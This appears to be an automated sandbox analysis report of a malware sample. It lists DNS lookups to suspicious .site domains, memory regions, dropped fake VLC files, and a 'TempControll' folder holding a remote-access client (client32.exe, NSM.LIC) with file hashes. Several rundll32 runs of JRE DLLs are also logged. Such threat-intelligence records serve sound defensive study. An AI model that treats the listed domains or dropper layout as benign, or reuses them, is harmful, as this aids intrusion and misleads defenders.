US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp

Files

memory/1292-0-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2052-3-0x0000000003170000-0x0000000003198000-memory.dmp

memory/2052-10-0x00000000031B8000-0x00000000031C0000-memory.dmp

memory/2052-13-0x00000000031C0000-0x00000000031C8000-memory.dmp

memory/2052-34-0x0000000003218000-0x0000000003220000-memory.dmp

memory/2052-33-0x0000000003208000-0x0000000003210000-memory.dmp

memory/2052-32-0x00000000031B0000-0x00000000031B8000-memory.dmp

memory/2052-31-0x00000000031A8000-0x00000000031B0000-memory.dmp

memory/2052-30-0x0000000003210000-0x0000000003218000-memory.dmp

memory/2052-36-0x0000000003220000-0x0000000003228000-memory.dmp

memory/2052-38-0x0000000003228000-0x0000000003230000-memory.dmp

memory/2052-43-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-42-0x0000000003238000-0x0000000003240000-memory.dmp

memory/2052-41-0x0000000003230000-0x0000000003238000-memory.dmp

memory/2052-46-0x0000000003240000-0x0000000003248000-memory.dmp

memory/2052-50-0x0000000003248000-0x0000000003250000-memory.dmp

memory/2052-49-0x0000000003170000-0x0000000003198000-memory.dmp

memory/2052-54-0x0000000003250000-0x0000000003258000-memory.dmp

memory/2052-53-0x00000000031B8000-0x00000000031C0000-memory.dmp

memory/2052-57-0x00000000031C0000-0x00000000031C8000-memory.dmp

memory/2052-58-0x0000000003258000-0x0000000003260000-memory.dmp

memory/2052-61-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-65-0x0000000003260000-0x0000000003268000-memory.dmp

memory/2052-64-0x0000000003218000-0x0000000003220000-memory.dmp

memory/2052-63-0x00000000031A8000-0x00000000031B0000-memory.dmp

memory/2052-62-0x0000000003210000-0x0000000003218000-memory.dmp

memory/2052-67-0x0000000003268000-0x0000000003270000-memory.dmp

memory/2052-71-0x0000000003270000-0x0000000003278000-memory.dmp

memory/2052-70-0x0000000003220000-0x0000000003228000-memory.dmp

memory/2052-76-0x0000000003278000-0x0000000003280000-memory.dmp

memory/2052-75-0x0000000003230000-0x0000000003238000-memory.dmp

memory/2052-74-0x0000000003228000-0x0000000003230000-memory.dmp

memory/2052-82-0x0000000003280000-0x0000000003288000-memory.dmp

memory/2052-86-0x0000000003288000-0x0000000003290000-memory.dmp

memory/2052-85-0x0000000003238000-0x0000000003240000-memory.dmp

memory/2052-89-0x0000000003240000-0x0000000003248000-memory.dmp

memory/2052-90-0x0000000003290000-0x0000000003298000-memory.dmp

memory/2052-94-0x0000000003298000-0x00000000032A0000-memory.dmp

memory/2052-93-0x0000000003248000-0x0000000003250000-memory.dmp

memory/2052-96-0x0000000003250000-0x0000000003258000-memory.dmp

memory/2052-97-0x00000000032A0000-0x00000000032A8000-memory.dmp

memory/2052-102-0x00000000032A8000-0x00000000032B0000-memory.dmp

memory/2052-101-0x0000000003258000-0x0000000003260000-memory.dmp

memory/2052-105-0x00000000032B0000-0x00000000032B8000-memory.dmp

memory/2052-104-0x0000000003260000-0x0000000003268000-memory.dmp

memory/2052-108-0x00000000032B8000-0x00000000032C0000-memory.dmp

memory/2052-107-0x0000000003268000-0x0000000003270000-memory.dmp

memory/2052-112-0x00000000032C0000-0x00000000032C8000-memory.dmp

memory/2052-111-0x0000000003270000-0x0000000003278000-memory.dmp

memory/2052-115-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-119-0x00000000032C8000-0x00000000032D0000-memory.dmp

memory/2052-118-0x0000000003278000-0x0000000003280000-memory.dmp

memory/2052-122-0x00000000032D0000-0x00000000032D8000-memory.dmp

memory/2052-121-0x0000000003280000-0x0000000003288000-memory.dmp

memory/2052-123-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-126-0x00000000032D8000-0x00000000032E0000-memory.dmp

memory/2052-125-0x0000000003288000-0x0000000003290000-memory.dmp

memory/2052-130-0x00000000032E0000-0x00000000032E8000-memory.dmp

memory/2052-129-0x0000000003290000-0x0000000003298000-memory.dmp

memory/2052-136-0x00000000032A0000-0x00000000032A8000-memory.dmp

memory/2052-135-0x00000000032E8000-0x00000000032F0000-memory.dmp

memory/2052-134-0x00000000032F0000-0x00000000032F8000-memory.dmp

memory/2052-133-0x0000000003298000-0x00000000032A0000-memory.dmp

memory/2052-143-0x00000000032B0000-0x00000000032B8000-memory.dmp

memory/2052-142-0x0000000003300000-0x0000000003308000-memory.dmp

memory/2052-141-0x00000000032F8000-0x0000000003300000-memory.dmp

memory/2052-140-0x00000000032A8000-0x00000000032B0000-memory.dmp

memory/2052-147-0x0000000003308000-0x0000000003310000-memory.dmp

memory/2052-146-0x00000000032B8000-0x00000000032C0000-memory.dmp

memory/2052-150-0x0000000003310000-0x0000000003318000-memory.dmp

memory/2052-149-0x00000000032C0000-0x00000000032C8000-memory.dmp

memory/2052-152-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-155-0x0000000003318000-0x0000000003320000-memory.dmp

memory/2052-153-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-154-0x00000000032C8000-0x00000000032D0000-memory.dmp

memory/2052-157-0x00000000032D0000-0x00000000032D8000-memory.dmp

memory/2052-158-0x0000000003320000-0x0000000003328000-memory.dmp

memory/2052-163-0x0000000003328000-0x0000000003330000-memory.dmp

memory/2052-162-0x00000000032D8000-0x00000000032E0000-memory.dmp

memory/2052-169-0x0000000003330000-0x0000000003338000-memory.dmp

memory/2052-168-0x00000000032E0000-0x00000000032E8000-memory.dmp

memory/2052-174-0x0000000003338000-0x0000000003340000-memory.dmp

memory/2052-173-0x00000000032E8000-0x00000000032F0000-memory.dmp

memory/2052-172-0x00000000032F0000-0x00000000032F8000-memory.dmp

memory/2052-176-0x0000000003340000-0x0000000003348000-memory.dmp

memory/2052-179-0x0000000003300000-0x0000000003308000-memory.dmp

memory/2052-180-0x0000000003348000-0x0000000003350000-memory.dmp

memory/2052-178-0x00000000032F8000-0x0000000003300000-memory.dmp

memory/2052-182-0x0000000003350000-0x0000000003358000-memory.dmp

memory/2052-185-0x0000000003308000-0x0000000003310000-memory.dmp

memory/2052-186-0x0000000003358000-0x0000000003360000-memory.dmp

memory/2052-189-0x0000000003360000-0x0000000003368000-memory.dmp

memory/2052-188-0x0000000003310000-0x0000000003318000-memory.dmp

memory/2052-192-0x0000000003368000-0x0000000003370000-memory.dmp

memory/2052-191-0x0000000003318000-0x0000000003320000-memory.dmp

memory/2052-195-0x0000000003370000-0x0000000003378000-memory.dmp

memory/2052-194-0x0000000003320000-0x0000000003328000-memory.dmp

memory/2052-198-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-201-0x0000000003328000-0x0000000003330000-memory.dmp

memory/2052-204-0x0000000003330000-0x0000000003338000-memory.dmp

memory/2052-205-0x0000000003338000-0x0000000003340000-memory.dmp

memory/2052-207-0x0000000003340000-0x0000000003348000-memory.dmp

memory/1424-221-0x00000000049C0000-0x00000000049F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe

MD5 e634616d3b445fc1cd55ee79cf5326ea
SHA1 ca27a368d87bc776884322ca996f3b24e20645f4
SHA256 1fcd04fe1a3d519c7d585216b414cd947d16997d77d81a2892821f588c630937
SHA512 7d491c0a97ce60e22238a1a3530f45fbb3c82377b400d7986db09eccad05c9c22fb5daa2b4781882f870ab088326e5f6156613124caa67b54601cbad8f66aa90

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlccore.dll

MD5 5bdff9dac8efdfedd169125e415a4111
SHA1 51bca77b201aa86b53735290c91bf4180cefe28e
SHA256 d5d609ce70c0459e07b7347f4a25d01e1526795d4c324034d4bbc9ac05d06ecd
SHA512 12aabb6ac23ea73d9625a3f61777f034951f333a30e17167d61c5a65d10acd2a83f392680d894ca941d20c84626f3257f3227c5f7f81c6d529b53edb0d8e4575

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlc.dll

MD5 4b262612db64f26ea1168ca569811110
SHA1 8e59964d1302a3109513cd4fd22c1f313e79654c
SHA256 a9340c99206f3388153d85df4ca94d33b28c60879406cc10ff1fd10eae16523f
SHA512 9902e64eb1e5ed4c67f4b7e523b41bde4535148c6be20db5f386a1da74533ca575383f1b3154f5985e379df9e1e164b6bda25a66504edcfaa57d40b04fc658c7

memory/1424-229-0x00000000050E0000-0x0000000005708000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\ulgbkv

MD5 8f37e80238556701210f07b7bbf91106
SHA1 b4593b7bd699bf461a568898e6b04f071476c8dd
SHA256 25a885ccdf9d1f231ef15d4abbf322513cd90ffa0699b553a64e73b0b70ca9e6
SHA512 df80ffa4625c7a35de4f577275c3794eca961cbd5ef0bd955a4a0cf662f783832ad6bc4496e8ebeb844d306d64dd0cf00f197ab419f9120bcfe804204b5be73e

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\bmrrr

MD5 d78f6cce7dd76163e1af90c2287b7a04
SHA1 166e4715075b449fd6b9cde5ee06b66a2df050d2
SHA256 e48fe2b9bbffe143e8d9bf7f5559469de7edfc4b1a2185980379f3a74510e6e1
SHA512 741ea7ae677185b41b0a8fc05dfe250a09d3f90856e073b7713110509cec8bd0764e7333e4bf8527edd2dea8c006a00ffd8b9b53b41db169ac546eed19dad82f

memory/1376-240-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp

memory/2052-243-0x0000000001610000-0x0000000001611000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qbxqo1y.exh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1376-263-0x00007FF7B4780000-0x00007FF7B4878000-memory.dmp

memory/1376-264-0x00007FFA0DCF0000-0x00007FFA0DD24000-memory.dmp

memory/1376-265-0x00007FF9FEE80000-0x00007FF9FF135000-memory.dmp

memory/4528-274-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf

MD5 acfffe6de49ab6bbcb590e95d558111b
SHA1 51d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256 fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA512 94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e

memory/2052-279-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-283-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-284-0x0000000001610000-0x0000000001611000-memory.dmp

memory/4528-385-0x00007FF669D00000-0x00007FF669DF8000-memory.dmp

memory/4528-387-0x00007FF9FE850000-0x00007FF9FEB05000-memory.dmp

memory/4528-386-0x00007FFA0DA60000-0x00007FFA0DA94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\78e2ff5b

MD5 a5d846508854a7780fdfa5d6e3b4bec6
SHA1 2d39b673bd582973e7bd61f00b1b9ec00c420abf
SHA256 41c0d14d578a4b2ae282488a341e1aff4b2d514169b221616e0255fbfe5fe8a0
SHA512 638bccded205a48b149c62a2cd3a415f1ac502bb1f1cb68c129db9b402ce6bce5b5d77a01e77dd0d520d42c891fa3a58beca5836906f4787eef63d490deedfc5

memory/4528-382-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp

memory/3624-395-0x00007FFA1CA90000-0x00007FFA1CC85000-memory.dmp

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

MD5 290c26b1579fd3e48d60181a2d22a287
SHA1 e4c91a7f161783c68cf67250206047f23bd25a29
SHA256 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128
SHA512 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

C:\Users\Admin\AppData\Roaming\TempControll\PCICL32.dll

MD5 d16ffa06a35601a73b73836bf905ed19
SHA1 b8231d36f921e5b75b592ea3374f19216a5c411f
SHA256 80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab
SHA512 e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168

C:\Users\Admin\AppData\Roaming\TempControll\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\TempControll\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\TempControll\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\TempControll\client32.ini

MD5 0cdedc9a0a1ee8c9f7ca140e543f2f1c
SHA1 2540f9e3c63b6174a60324b137ffb5697c1a7df8
SHA256 3e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6
SHA512 068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2

C:\Users\Admin\AppData\Roaming\TempControll\NSM.LIC

MD5 12b8cc1d0a34012bbbbe86880333c567
SHA1 e89659c412af82e31e6d14c34e47d7cc4c5ec9a5
SHA256 9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f
SHA512 eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc

C:\Users\Admin\AppData\Roaming\TempControll\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 680407510c90ee4993405cc21a3a9e60
SHA1 befa482c34419dd4ed26a3e5467720143752a998
SHA256 1e55c92eca80e75e31ae4f09309267619014894229a4a3191ca74d4962cafff0
SHA512 b856c6d2c105f66e6bf9f42208b5a3f685899bfd379cafc9d9212ee6f87819e04a7593db8c3d25601b009b9d647c729df023ac4e239d09e8eb77d24eb9cf2d8c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a12e9f958f6a2179ef9314b84678ffe1
SHA1 1abd9a2f8bd5df0f44fa227f1b39d85820882315
SHA256 9db7a2644d7c88acccf747f15f10f06a618c1691ed82fa6846f725a2a77e8ffe
SHA512 99e8cef0f508226a90db3434daa98a028c3ba71a70223095ffd4f13edb3e064fd9cf611c9d7146f573c0f92dde23df31309155836ed35b10a13ab031b909e6f2

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b640a1fd35b6da291a82e50751297936
SHA1 bab11eb2681fb11bebad30352134197442d066da
SHA256 e983bfb52d4e8cb64382c29f91d7b4dbed12a9b471d0552f79b7e8e5fcda68e3
SHA512 d4924d4e5cb3d09ebd3a818e8a2a5df0cb6ae80d405e360f4b84d81d74585a0ab96c7a2c5e7f74d2664e4a882ca7fd8c863202170338dbc2ba96a34ed8801fda

memory/3624-595-0x0000000065300000-0x000000006547B000-memory.dmp

memory/4536-598-0x00007FFA1CA90000-0x00007FFA1CC85000-memory.dmp

memory/4536-599-0x0000000000FB0000-0x0000000001015000-memory.dmp

memory/1652-601-0x0000000009B00000-0x0000000009C4D000-memory.dmp

memory/4536-602-0x0000000000FB0000-0x0000000001015000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

89s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 792 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 792 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 792 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4944 -ip 4944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 52.111.227.11:443 tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

131s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Signatures

N/A

Processes

C:\Windows\system32\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Network

N/A

Files

memory/1192-2-0x0000000002590000-0x0000000002800000-memory.dmp

memory/1192-10-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1192-11-0x0000000002590000-0x0000000002800000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

118s

Max time network

124s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

133s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4420 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4420 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4420 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 102.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

90s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1852 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1852 wrote to memory of 4256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4256 -ip 4256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 604

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 102.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

159s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Signatures

N/A

Processes

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/4476-2-0x0000014311360000-0x00000143115D0000-memory.dmp

memory/4476-11-0x0000014311340000-0x0000014311341000-memory.dmp

memory/4476-12-0x0000014311360000-0x00000143115D0000-memory.dmp